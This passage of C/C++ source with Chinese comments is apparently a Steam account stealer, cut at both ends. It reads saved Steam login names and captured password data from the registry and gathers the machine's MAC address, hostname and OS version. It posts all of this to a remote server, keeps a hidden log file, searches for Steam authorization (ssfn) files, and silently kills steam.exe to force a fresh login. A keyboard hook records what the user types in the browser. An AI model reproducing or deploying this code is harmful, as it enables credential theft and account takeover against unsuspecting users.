*/szLocalLP = "3";HKEY hKey, xKey;LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char user[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;LONG lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)user, &dwLength );if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 ){CString LocalUser = "";CString ReadRegUser = "";LocalUser.Format(TEXT("%s"), user);ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet2 == ERROR_SUCCESS ){char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;LONG lRet3 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &dwType1, (LPBYTE)data1, &dwLength1 );LONG lRet4 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );LONG lRet5 = RegQueryValueEx( xKey, TEXT("AccSecond"), NULL, &dwType3, (LPBYTE)data3, &dwLength3 );LONG lRet6 = RegQueryValueEx( xKey, TEXT("DataSecond"), NULL, &dwType4, (LPBYTE)data4, &dwLength4 );if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) ){CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";szRegAccOne.Format(TEXT("%s"), data1);szRegDataOne.Format(TEXT("%s"), data2);szRegAccSecon.Format(TEXT("%s"), data3);szRegDataSecon.Format(TEXT("%s"), data4);/// 随机生成 16位 KEYtime_t seed = time(NULL); srand((unsigned)seed);int randNum = (rand()*2);CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";szMD5Key += "_CHWM_";int szMD5Key_Len = szMD5Key.GetLength();for(int j=szMD5Key_Len; j<16 ;j++){int randNum = rand()%26;if(j%2){szMD5.Format("%C", randNum+97);}else{szMD5.Format("%C", randNum+65);}szMD5Key += szMD5;Sleep(50);}szMD5Key = gen(szMD5Key);Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());/memset(osx, 0, MAX_PATH);memset(jsj, 0, MAX_PATH);// 获取计算机名WSADATA _wsaData = {0};int _Result = 0;_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}_Result = gethostname(jsj, sizeof(jsj));if(_Result == SOCKET_ERROR){strcat(jsj, "unkonw");}WSACleanup();// 获取MACCString szMac = "";szMac = GetMacAddress();// 获取系统版本os();// 构建统计数据CString strPostData = "";strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), strServerName, szMac, osx, jsj, szVersion, strUserID, szRegAccOne, szRegDataOne, szRegAccSecon, szRegDataSecon, Base64_szMD5Key,szLocalLP);strPostData.Replace(" ", "%20");//AfxMessageBox(strPostData);DWORD dw0;BOOL isConnect = ::IsNetworkAlive( &dw0 );if( isConnect ){BOOL Result = SendURLPost(strPostData);if( Result ){//AfxMessageBox("成功发送数据!");FILE *fp;CFileFind finder1x;BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");if(!noEmpty1x){fp=fopen("C:\\NTUSERS.LOG", "w");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}else{fp=fopen("C:\\NTUSERS.LOG", "a");if(fp){fprintf(fp, "%s", LocalUser.GetBuffer(0));}fclose(fp);}//隐藏数据文件SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;///// 处理电脑授权文件CString mySTInstPath = "", mySTSSFNFilePath = "";HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );mySTInstPath.Format(TEXT("%s"), dw_data);mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);mySTInstPath.ReleaseBuffer();char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);mySTSSFNFilePath.ReleaseBuffer();//AfxMessageBox(mySTInstPath);//AfxMessageBox(mySTSSFNFilePath);SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);szTslgameEXE = true;Sleep(3000);DWORD dwThreadId4;CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); ///}else{//AfxMessageBox("发送数据失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Login = false;szLoginEXE = true;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}}}Login = false;szLoginEXE = true;RegCloseKey(xKey);RegCloseKey(hKey);}}}else{if( !GetProcess("steam.exe") ){Login = false;szLoginEXE = true;}}Sleep(100);} while( !szLoginEXE );return 0;
}// 线程 1static DWORD WINAPI HOOKRegedit(LPVOID pParam)
{//AfxMessageBox("线程 1 已启动!");HANDLE hNotify;HKEY hKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE, //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," ",MB_OK);szStrFirst = "";szStrFirst = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2, lRet3, lRet4;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0}, data2[256] = {0};DWORD dwType = REG_SZ, dwType2 = REG_SZ;DWORD dwLength = 256, dwLength2 = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );lRet3 = RegQueryValueEx( hKey, TEXT("SteamExe"), NULL, &dwType2, (LPBYTE)data2, &dwLength2 );DWORD dwLastXError = 0;lRet4 = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastXError, sizeof(DWORD) );if(lRet2 == ERROR_SUCCESS && lRet3 == ERROR_SUCCESS){szRegUser.Format(TEXT("%s"), data);szRegExe.Format(TEXT("%s"), data2);DWORD flen;char *dataX;CFile *file2;file2 = new CFile;if( file2->Open("C:\\NTUSERS.LOG", CFile::shareDenyNone | CFile::modeRead) ){flen = file2->GetLength();dataX = new char[(int)flen+1];file2->SeekToBegin();file2->Read(dataX, flen);}szAccount.Format(TEXT("%s"), dataX);file2->Close();delete file2;delete []dataX;//AfxMessageBox(szAccount);int ff = szAccount.Find(szRegUser, 0);if( ff >= 0 ){//AfxMessageBox("帐号:"+szRegUser+"\n模糊数据:"+szStrFirst+"\n当前 帐号 为重复数据!");Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}else{HKEY dw_hKey;LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );if( x_Ret1 == ERROR_SUCCESS ){char dw_data[256] = {0};DWORD dw_Type = REG_SZ;DWORD dw_Length = 256;LONG x_Ret2 = RegQueryValueEx( dw_hKey, TEXT("SteamPath"), NULL, &dw_Type, (LPBYTE)dw_data, &dw_Length );szSTPath.Format(TEXT("%s"), dw_data);szSTFile.Format(TEXT("%s/ssfn*"), dw_data);}RegCloseKey(dw_hKey);//// 删除电脑授权文件//char *mySSFNPath = szSTPath.GetBuffer(szSTPath.GetLength()+1);//szSTPath.ReleaseBuffer();//char *mySSFNFile = szSTFile.GetBuffer(szSTFile.GetLength()+1);//szSTFile.ReleaseBuffer();//SearchFilesByWildcard_1(mySSFNPath, mySSFNFile);//CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser);HKEY hKeyX;DWORD dwDisp;DWORD dwTypeX = REG_SZ;int ret = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKeyX, &dwDisp);if (ret == ERROR_SUCCESS){szOneUser=szRegUser+" ";szRegUser=gen(szRegUser);CString Base64_szRegUser = "";Base64_szRegUser = BASE64Encode(szRegUser, szRegUser.GetLength());char *szAc1 = Base64_szRegUser.GetBuffer(Base64_szRegUser.GetLength()+1);Base64_szRegUser.ReleaseBuffer();int ret2 = RegSetValueEx(hKeyX, TEXT("AccOne"), 0, dwTypeX, (BYTE*)szAc1, strlen(szAc1));if (ret2 == ERROR_SUCCESS){szStrFirst=gen(szStrFirst);CString Base64_szStrFirst = "";Base64_szStrFirst = BASE64Encode(szStrFirst, szStrFirst.GetLength());char *szDt1 = Base64_szStrFirst.GetBuffer(Base64_szStrFirst.GetLength()+1);Base64_szStrFirst.ReleaseBuffer();int ret3 = RegSetValueEx(hKeyX, TEXT("DataOne"), 0, dwTypeX, (BYTE*)szDt1, strlen(szDt1));if (ret3 == ERROR_SUCCESS){//AfxMessageBox("首次帐号:"+szRegUser+"\n首次模糊数据:"+szDt1+"\nEXE路径:"+szRegExe);DWORD dwLastError = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastError, sizeof(DWORD) );RegCloseKey(hKeyX);RegCloseKey(hKey);CloseHandle(hNotify);RegCloseKey(hKeyx);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe && \""+szRegExe+"\"", NULL, SW_HIDE);Sleep(2000);Regedit = false;//MessageBox(0, "steam.exe 读取系统数据失败,请再次登录! ", "[ Steam ]", MB_ICONERROR | MB_OK | MB_DEFBUTTON1);}}}RegCloseKey(hKeyX);}}}RegCloseKey(hKey);}CloseHandle(hNotify);RegCloseKey(hKeyx);return 0;
}// 线程 2static DWORD WINAPI HOOKRegedit2(LPVOID pParam)
{//AfxMessageBox("线程 2 已启动!");HKEY hKey_xxx;LONG lRet_xxx1 = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey_xxx );if( lRet_xxx1 == ERROR_SUCCESS ){char data_xxx[256] = {0};DWORD dwType_xxx = REG_SZ;DWORD dwLength_xxx = 256;memset(data_xxx, 0, 256);LONG lRet_xxx2 = RegQueryValueEx( hKey_xxx, TEXT("AutoLoginUser"), NULL, &dwType_xxx, (LPBYTE)data_xxx, &dwLength_xxx );if(lRet_xxx2 == ERROR_SUCCESS){CString myReg1User = "";myReg1User.Format(TEXT("%s "), data_xxx);char *sz1User = myReg1User.GetBuffer(myReg1User.GetLength()+1);myReg1User.ReleaseBuffer();DWORD XdwType_X = REG_SZ;RegSetValueEx( hKey_xxx, TEXT("AutoLoginUser"), 0, XdwType_X, (BYTE*)sz1User, strlen(sz1User) );}}RegCloseKey(hKey_xxx);HANDLE hNotify;HKEY hxKeyx;hNotify = CreateEvent(NULL, //不使用SECURITY_ATTRIBUTES结构 FALSE, //不自动重置 TRUE, //设置初始状态 "RegistryNotify" //事件对象的名称 ); if (hNotify == 0) { Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe CreateEvent failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegOpenKeyEx(HKEY_CURRENT_USER, //根键 "Software\\Valve\\Steam", //子键 0, //reserved KEY_NOTIFY, //监视用 &hxKeyx //保存句柄 ) != ERROR_SUCCESS) { CloseHandle(hNotify); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegOpenKey failed!","[ Steam ]",MB_OK); ExitProcess(0); } if (RegNotifyChangeKeyValue(hxKeyx, //监视子键句柄 TRUE, //监视此项的子键 REG_NOTIFY_CHANGE_NAME | REG_NOTIFY_CHANGE_LAST_SET, //监视增加或删除了子键,监视键值发生是否改变 hNotify, //接受注册表变化事件的事件对象句柄 TRUE //注册表变化前报告 ) != ERROR_SUCCESS) { CloseHandle(hNotify); RegCloseKey(hxKeyx); Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);MessageBox(NULL,"steam.exe RegNotifyChange failed!","[ Steam ]", MB_OK); ExitProcess(0); } if (WaitForSingleObject(hNotify, INFINITE) != WAIT_FAILED) { //MessageBox(NULL,"注册表有改动"," ",MB_OK);szStrSecon = "";szStrSecon = szStr;szStr = "";HKEY hKey;LONG lRet, lRet2;lRet = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );if( lRet == ERROR_SUCCESS ){char data[256] = {0};DWORD dwType = REG_SZ;DWORD dwLength = 256;lRet2 = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwType, (LPBYTE)data, &dwLength );if(lRet2 == ERROR_SUCCESS){szMailID.Format(TEXT("%s"), data);szMailID.Replace(" ", "");szRegUser2.Format(TEXT("%s"), data);szRegUser2.Replace(" ", "");//AfxMessageBox("二次帐号:"+szRegUser2+"\n二次密码:"+szStrSecon);CString ReadRegUser = "";ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser2);HKEY xKey;LONG lRet3, lRet4, lRet5;lRet3 = RegOpenKeyEx( HKEY_CURRENT_USER,ReadRegUser,0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );if( lRet3 == ERROR_SUCCESS ){char xdata[256] = {0};char xdata2[256] = {0};DWORD xdwType1 = REG_SZ;DWORD xdwType2 = REG_SZ;DWORD xdwLength1 = 256;DWORD xdwLength2 = 256;lRet4 = RegQueryValueEx( xKey, TEXT("AccOne"), NULL, &xdwType1, (LPBYTE)xdata, &xdwLength1 );lRet5 = RegQueryValueEx( xKey, TEXT("DataOne"), NULL, &xdwType2, (LPBYTE)xdata2, &xdwLength2 );if(lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser2 + " ";szRegUser2 = gen(szRegUser2);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser2, szRegUser2.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XxdwTypeX1 = REG_SZ, XxdwTypeX2 = REG_SZ;LONG lRet6 = RegSetValueEx( xKey, TEXT("AccSecond"), NULL, XxdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7 = RegSetValueEx( xKey, TEXT("DataSecond"), NULL, XxdwTypeX2, (BYTE*)szData2, strlen(szData2));if(lRet6 == ERROR_SUCCESS && lRet7 == ERROR_SUCCESS){//AfxMessageBox("设置注册表用户数据成功!");if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}DWORD xdwLastErrorx = 0;RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&xdwLastErrorx, sizeof(DWORD) );}else{//AfxMessageBox("设置注册表用户数据失败!");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据键值失败!");DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("AutoLoginUser"));RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);Regedit = false;ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}else{//AfxMessageBox("打开注册表用户数据目录失败!");char dataZ[256] = {0};DWORD dwTypeZ = REG_SZ;DWORD dwLengthZ = 256;LONG lRet3Z = RegQueryValueEx( hKey, TEXT("AutoLoginUser"), NULL, &dwTypeZ, (LPBYTE)dataZ, &dwLengthZ );DWORD dwLastErrorx = 0;LONG lRet4Z = RegSetValueEx( hKey, TEXT("RememberPassword"), NULL, REG_DWORD, (LPBYTE)&dwLastErrorx, sizeof(DWORD) );if(lRet3Z == ERROR_SUCCESS){//AfxMessageBox("Gaming is True!\n二次帐号:"+szRegUser3+"\n二次密码:"+szStrSecon);CString szRegUser3 = "";szRegUser3.Format(TEXT("%s"), dataZ);CString WriteRegUser = "";WriteRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), szRegUser3);HKEY xhKeyX;DWORD XxdwDisp;LONG lRetz = RegCreateKeyEx(HKEY_CURRENT_USER, WriteRegUser, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &xhKeyX, &XxdwDisp);if(lRetz == ERROR_SUCCESS){CString szReplaceStr = "";CString Base64_AccSeconData = "", Base64_DataSeconData = "";szReplaceStr = szRegUser3 + " ";szRegUser3 = gen(szRegUser3);Sleep(500);szStrSecon.Replace(szReplaceStr, "");szStrSecon = gen(szStrSecon);Base64_AccSeconData = BASE64Encode(szRegUser3, szRegUser3.GetLength());Sleep(500);Base64_DataSeconData = BASE64Encode(szStrSecon, szStrSecon.GetLength());char *szAcc2 = Base64_AccSeconData.GetBuffer(Base64_AccSeconData.GetLength()+1);Base64_AccSeconData.ReleaseBuffer();char *szData2 = Base64_DataSeconData.GetBuffer(Base64_DataSeconData.GetLength()+1);Base64_DataSeconData.ReleaseBuffer();DWORD XdwTypeX1 = REG_SZ, XdwTypeX2 = REG_SZ;DWORD XdwTypeX3 = REG_SZ, XdwTypeX4 = REG_SZ;LONG lRet6z = RegSetValueEx( xhKeyX, TEXT("AccSecond"), NULL, XdwTypeX1, (BYTE*)szAcc2, strlen(szAcc2));LONG lRet7z = RegSetValueEx( xhKeyX, TEXT("DataSecond"), NULL, XdwTypeX2, (BYTE*)szData2, strlen(szData2));LONG lRet8z = RegSetValueEx( xhKeyX, TEXT("AccOne"), NULL, XdwTypeX3, (BYTE*)"", 0);LONG lRet9z = RegSetValueEx( xhKeyX, TEXT("DataOne"), NULL, XdwTypeX4, (BYTE*)"", 0);if(lRet6z == ERROR_SUCCESS && lRet7z == ERROR_SUCCESS && lRet8z == ERROR_SUCCESS && lRet9z == ERROR_SUCCESS){if( !Login ){DWORD dwThreadId;thread = CreateThread(NULL, 0, HOOKLoginEXE, NULL, 0, &dwThreadId);Login = true;}RegDeleteValue(hKey, TEXT("Gaming"));}else{RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(xhKeyX);RegCloseKey(xKey);RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}RegCloseKey(xhKeyX);}else{DeleteFile("C:\\NTUSERS.LOG");RegDeleteValue(hKey, TEXT("Gaming"));RegDeleteValue(hKey, TEXT("AutoLoginUser"));Regedit = false;RegCloseKey(hKey);RegCloseKey(hxKeyx);CloseHandle(hNotify);ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);}}Regedit = false;RegCloseKey(xKey);}else{Regedit = false;RegDeleteValue(hKey, TEXT("AutoLoginUser"));}}RegCloseKey(hKey);} CloseHandle(hNotify);RegCloseKey(hxKeyx);return 0;
}// 清理帐号记录文件static DWORD WINAPI CleanUserData(LPVOID pParam)
{while(1){// 3 小时清理一次记录数据Sleep(3600000);DeleteFile("C:\\NTUSERS.LOG");}return 0;
}// HOOK 键盘回调函数 2 (监控 浏览器 输入)LRESULT DllExport CALLBACK IntProc2(int nCode, WPARAM wParam, LPARAM lParam)
{if( !::EnumWindows(EnumWindowsProc, NULL) ){if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR = "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "1";break;case '2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break;case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "A";break;case 'B':myEmailSTR = "B";break;case 'C':myEmailSTR = "C";break;case 'D':myEmailSTR = "D";break;case 'E':myEmailSTR = "E";break;case 'F':myEmailSTR = "F";break;case 'G':myEmailSTR = "G";break;case 'H':myEmailSTR = "H";break;case 'I':myEmailSTR = "I";break;case 'J':myEmailSTR = "J";break;case 'K':myEmailSTR = "K";break;case 'L':myEmailSTR = "L";break;case 'M':myEmailSTR = "M";break;case 'N':myEmailSTR = "N";break;case 'O':myEmailSTR = "O";break;case 'P':myEmailSTR = "P";break;case 'Q':myEmailSTR = "Q";break;case 'R':myEmailSTR = "R";break;case 'S':myEmailSTR = "S";break;case 'T':myEmailSTR = "T";break;case 'U':myEmailSTR = "U";break;case 'V':myEmailSTR = "V";break;case 'W':myEmailSTR = "W";break;case 'X':myEmailSTR = "X";break;case 'Y':myEmailSTR = "Y";break;case 'Z':myEmailSTR = "Z";break;}}else if(b_Sft && b_Clk){switch(wParam){case '1':myEmailSTR = "!";break;case '2':myEmailSTR = "@";break;case '3':myEmailSTR = "#";break;case '4':myEmailSTR = "$";break;case '5':myEmailSTR = "%";break;case '6':myEmailSTR = "^";break;case '7':myEmailSTR = "&";break;case '8':myEmailSTR = "*";break;case '9':myEmailSTR = "(";break;case '0':myEmailSTR = ")";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}else{switch(wParam){case '1':myEmailSTR = "1";break;case '2':myEmailSTR = "2";break;case '3':myEmailSTR = "3";break;case '4':myEmailSTR = "4";break; case '5':myEmailSTR = "5";break;case '6':myEmailSTR = "6";break;case '7':myEmailSTR = "7";break;case '8':myEmailSTR = "8";break;case '9':myEmailSTR = "9";break;case '0':myEmailSTR = "0";break;case 'A':myEmailSTR = "a";break;case 'B':myEmailSTR = "b";break;case 'C':myEmailSTR = "c";break;case 'D':myEmailSTR = "d";break;case 'E':myEmailSTR = "e";break;case 'F':myEmailSTR = "f";break;case 'G':myEmailSTR = "g";break;case 'H':myEmailSTR = "h";break;case 'I':myEmailSTR = "i";break;case 'J':myEmailSTR = "j";break;case 'K':myEmailSTR = "k";break;case 'L':myEmailSTR = "l";break;case 'M':myEmailSTR = "m";break;case 'N':myEmailSTR = "n";break;case 'O':myEmailSTR = "o";break;case 'P':myEmailSTR = "p";break;case 'Q':myEmailSTR = "q";break;case 'R':myEmailSTR = "r";break;case 'S':myEmailSTR = "s";break;case 'T':myEmailSTR = "t";break;case 'U':myEmailSTR = "u";break;case 'V':myEmailSTR = "v";break;case 'W':myEmailSTR = "w";break;case 'X':myEmailSTR = "x";break;case 'Y':myEmailSTR = "y";break;case 'Z':myEmailSTR = "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:myEmailSTR = "1";break;case VK_NUMPAD2:myEmailSTR = "2";break;case VK_NUMPAD3:myEmailSTR = "3";break;case VK_NUMPAD4:myEmailSTR = "4";break;case VK_NUMPAD5:myEmailSTR = "5";break;case VK_NUMPAD6:myEmailSTR = "6";break;case VK_NUMPAD7:myEmailSTR = "7";break;case VK_NUMPAD8:myEmailSTR = "8";break;case VK_NUMPAD9:myEmailSTR = "9";break;case 